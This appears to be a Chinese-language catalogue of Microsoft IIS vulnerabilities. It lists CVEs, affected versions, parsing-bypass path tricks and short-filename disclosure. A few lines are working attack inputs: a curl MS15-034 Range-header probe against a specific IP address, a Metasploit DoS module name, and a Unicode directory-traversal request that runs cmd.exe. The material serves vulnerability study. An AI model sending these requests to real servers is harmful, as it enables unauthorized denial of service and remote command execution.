應用安全 - 中間件 - IIS - 漏洞 - 匯總

簡介

支持協議    HTTP HTTP/2 HTTPS FTP FTPS SMTP NNTP等                        
支持操作系統    NT/2000/XP Professional/Server 2003及后續版本（XP Home中沒有）   

解析漏洞

​IIS 6.0 ​ /xx.asp/xx.jpg "xx.asp"是文件夾名 ​IIS 7.0/7.5 ​ 默認Fast-CGI開啟，直接在url中圖片地址后面輸入/1.php，會把正常圖片當成php解析

CVE-2017-7269

Date 2017 類型 遠程代碼執行
 影響范圍
IIS6.0 + WebDAV + Windows Server 2003 R2 復現 POC
EXP

 

CVE-2009-4444

Date
2009

類型
Microsoft IIS畸形文件擴展名繞過安全限制漏洞  

影響版本
IIS 6.0

 

 CVE-2005-4360（MS07-041）

Date 2005

類型

遠程緩沖區溢出漏洞 

 

影響范圍

 IIS 5.1

 

CVE-2009-3023

Date 2009 類型
遠程代碼執行

影響范圍
IIS 5.0、IIS 5.1、IIS 6.0

 

CVE-2009-2521

Date 2009 類型
DDOS

影響范圍
IIS 5.0、IIS 5.1、IIS 6.0、IIS 7.0

 

IIS認證繞過和源碼泄露

類型
越權+源碼泄露

影響范圍
IIS 6.0、IIS 7.5

 

CVE-2015-1635 (MS15-034)

Date
2015

類型
遠程代碼執行

影響范圍
IIS：版本 > 6.0
操作系統：Windows Server 2008 R2 | Server 2012 | Server 2012 R2 | Windows 7 | Windows 8 | Windows 8.1

前置條件
有web服務

復現
POC
curl http://180.76.196.110 -H "Host: 180.76.196.110" -H "Range: bytes=0-18446744073709551615"  --》Requested Rabge Not Satisfiable
EXP
use auxiliary/dos/http/ms15_034_ulonglongadd

CVE-2000-0884

Date 2000 類型
遠程代碼執行
 影響范圍
IIS 4.0, 5.0 servers

復現
POC | EXP
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

短文件名

IIS 1.0，Windows NT 3.51 IIS 3.0，Windows NT 4.0 Service Pack 2 IIS 4.0，Windows NT 4.0選項包 IIS 5.0，Windows 2000 IIS 5.1，Windows XP Professional和Windows XP Media Center Edition IIS 6.0，Windows Server 2003和Windows XP Professional x64 Edition IIS 7.0，Windows Server 2008和Windows Vista IIS 7.5，Windows 7（遠程啟用<customErrors>或沒有web.config） IIS 7.5，Windows 2008（經典管道模式） IS 8.0，Windows 8, Windows Server 2012 IIS 8.5，Windows 8.1,Windows Server 2012 R2 IIS 10.0，Windows 10, Windows Server 2016 注意：IIS使用.Net Framework 4時不受影響

復現